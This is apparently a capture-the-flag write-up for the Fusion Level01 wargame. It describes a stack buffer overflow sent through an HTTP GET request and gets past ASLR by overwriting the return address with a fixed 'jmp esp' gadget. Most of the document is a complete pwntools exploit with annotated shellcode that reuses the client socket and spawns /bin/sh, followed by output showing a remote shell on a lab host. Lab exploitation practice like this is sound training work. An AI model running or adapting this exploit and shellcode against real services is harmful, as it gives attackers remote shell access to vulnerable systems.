Fusion Level01
- NX is still disabled, but ASLR is now on.
- So the buffer address can no longer be read off the binary: the stack moves on every run, and a hardcoded stack address as the return value will miss.
- All you need is a 'jmp esp' gadget. The gadget used below, 0x8049f4f, lies in the binary's own code, which is loaded at a fixed address here regardless of ASLR. Overwrite the saved return address with it and put the shellcode immediately after: when the function returns, esp points at the first shellcode byte, so 'jmp esp' lands on it with no stack address needed.
```python
from pwn import *

# Shellcode, three stages (byte strings so it runs under Python 2 and 3):
# 1. find the client socket: dup(2) returns the lowest free fd, so
#    dup(2) - 1 is the highest open fd, which in the forked handler is
#    the accepted connection (assumes the fds are contiguous)
# 2. dup2(sock, 0..2) so the shell reads and writes over the socket
# 3. execve("/bin//sh", NULL, NULL)
sc  = b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80"           # push 2; pop ebx; push 0x29; pop eax; int 0x80 (dup)
sc += b"\x48\x89\xc6\x31\xc9"                       # dec eax; mov esi, eax; xor ecx, ecx
sc += b"\x56\x5b\x6a\x3f\x58\xcd\x80"               # push esi; pop ebx; push 0x3f; pop eax; int 0x80 (dup2)
sc += b"\x41\x80\xf9\x03\x75\xf5"                   # inc ecx; cmp cl, 3; jne back to the dup2 call
sc += b"\x6a\x0b\x58\x99\x52\x31\xf6\x56"           # push 0xb; pop eax; cdq; push edx; xor esi, esi; push esi
sc += b"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"   # push "//sh"; push "/bin"
sc += b"\x89\xe3\x31\xc9\xcd\x80"                   # mov ebx, esp; xor ecx, ecx; int 0x80 (execve)

s = remote('192.168.56.136', 20001)

jmp_esp = 0x8049f4f          # 'jmp esp' inside the binary; fixed address, unaffected by ASLR

payload  = b"GET "
payload += b"A" * 139        # padding up to the saved return address
payload += p32(jmp_esp)      # ret -> jmp esp
payload += sc                # esp points here right after ret
payload += b" HTTP/1.1"

s.send(payload)
s.interactive()
```
```
zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20001: Done
[*] Switching to interactive mode
$ id
uid=20001 gid=20001 groups=20001
```